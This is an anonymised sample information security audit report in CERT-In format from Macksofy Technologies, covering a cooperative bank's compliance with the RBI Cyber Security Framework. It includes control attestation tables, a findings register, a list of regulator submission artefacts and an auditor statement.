Information Security Audit Report — CERT-In Format
A representative anonymised Macksofy CERT-In format audit report. Demonstrates structure, control attestation table, regulator submission package and auditor statement that we deliver on real engagements.
1. Auditor and Empanelment
This information security audit was conducted by Macksofy Technologies Pvt Ltd, an Information Security Auditor empanelled by the Indian Computer Emergency Response Team (CERT-In) under the Ministry of Electronics and Information Technology, Government of India.
| Auditor | Macksofy Technologies Pvt Ltd |
| Empanelment | CERT-In Empanelled Information Security Auditor (sample) |
| Auditor address | 308, Building No. 11, SRA Commercial Tower, BKC, Mumbai 400051 |
| Engagement Lead | Senior Consultant — OSCP / OSWE certified |
| Lead Auditor signature | Digitally signed copy attached separately |
| Audit period | 10 working days · April 2026 |
| Report date | April 2026 |
2. Auditee Organisation
| Auditee | Acme Cooperative Bank Ltd (anonymised) |
| Sector | Cooperative Bank · Tier-2 (RBI 4-Tier Framework) |
| Regulator | Reserve Bank of India (RBI) |
| Audit objective | Annual cybersecurity audit per RBI Cyber Security Framework + System Audit Report submission |
| Branches in scope | 47 branches · Western Maharashtra |
| Critical systems | Core Banking System · ATM switch · Internet Banking · Mobile Banking · NEFT/RTGS |
3. Audit Scope & Methodology
3.1 In-scope domains
- Information Security Governance and Policies
- Risk Management and Asset Inventory
- Access Control and Identity Management
- Network Security (perimeter, internal, segmentation)
- Application Security (Internet Banking + Mobile Banking)
- Endpoint Security and ATM Environment
- Logging, Monitoring and Incident Response
- Third-party Risk Management
- Business Continuity and Disaster Recovery
- Customer Awareness and Anti-Phishing
3.2 Methodology
Audit conducted in line with RBI Cyber Security Framework (June 2016, updated), RBI Master Direction on IT Governance, Risk, Controls and Assurance Practices (2023) and CERT-In Information Security Audit Scope. Includes documentary review, interviews with key personnel, configuration inspection on a sample of in-scope systems, technical Vulnerability Assessment and Penetration Testing of internet-facing assets, and walk-through of incident response runbooks.
4. Control Attestation Summary
Compliance status against the eight high-level control domains under the RBI Cyber Security Framework. Detailed sub-control evidence is provided in Annexure A of the full report.
| Domain | Sub-controls | Compliant | Partial | Non-compliant |
|---|---|---|---|---|
| Governance and policy | 12 | 11 | 1 | 0 |
| Risk management | 8 | 6 | 2 | 0 |
| Access control | 14 | 11 | 2 | 1 |
| Network security | 18 | 14 | 3 | 1 |
| Application security | 11 | 7 | 3 | 1 |
| Endpoint + ATM | 9 | 7 | 1 | 1 |
| Monitoring + IR | 10 | 8 | 2 | 0 |
| BCP / DR | 7 | 6 | 1 | 0 |
| Total | 89 | 70 | 15 | 4 |
Overall posture: 78.6% compliant — strong baseline with localised gaps in application security and ATM-network segmentation. None of the four non-compliant findings are deemed material to systemic stability; all are remediable within a 90-day window.
5. Findings Register (Material)
| Ref | Finding | Severity | Target close |
|---|---|---|---|
| F-001 | ATM management network not segmented from branch LAN | Critical | 30 days |
| F-002 | Mobile banking app missing certificate-pinning | Critical | 30 days |
| F-003 | Privileged Active Directory accounts without smartcard / hardware MFA | Critical | 60 days |
| F-004 | Wi-Fi at 3 branches uses WPA2-PSK with shared password | Critical | 30 days |
| F-005 | DR site replication lag exceeds RPO target during peak hours | High | 60 days |
| F-006 | Internet banking session timeout 30min — exceeds RBI guideline | High | 30 days |
| F-007 | Vendor remote-access uses shared service account | High | 60 days |
| F-008 | SOC alert volume — false-positive rate ~62% on top use-case | High | 60 days |
Eight material findings shown for sample. Full report contains the complete register with proof-of-concept evidence, recommended fix and management response per finding.
6. Regulator Submission Package
Macksofy delivers the following artefacts as part of every CERT-In format engagement, structured for direct submission to RBI / SEBI / UIDAI / IRDAI inspections:
- This signed audit report (Section 1–8)
- Annexure A — full sub-control evidence register (89 controls)
- Annexure B — VAPT findings + proof-of-concept evidence
- Annexure C — interview transcripts and personnel attestations
- Annexure D — network diagrams + asset register snapshot
- Annexure E — incident-response runbook walkthrough notes
- Annexure F — third-party / vendor risk register
- Annexure G — BCP / DR test report
- Macksofy CERT-In empanelment letter (separate cover)
- Auditor digital signature certificate
7. Auditor Statement
Based on the procedures performed and evidence reviewed during the audit period, in our professional opinion the auditee organisation maintains an information security control environment that is broadly compliant with the RBI Cyber Security Framework, with localised exceptions captured in Section 5. The identified critical and high-severity findings are addressable within the indicated timelines and Macksofy has agreed to perform a complimentary retest within 30 days of remediation closure.
This audit was performed in good faith based on the documents and systems made available during the audit window. No assurance is provided regarding controls or systems outside the agreed scope.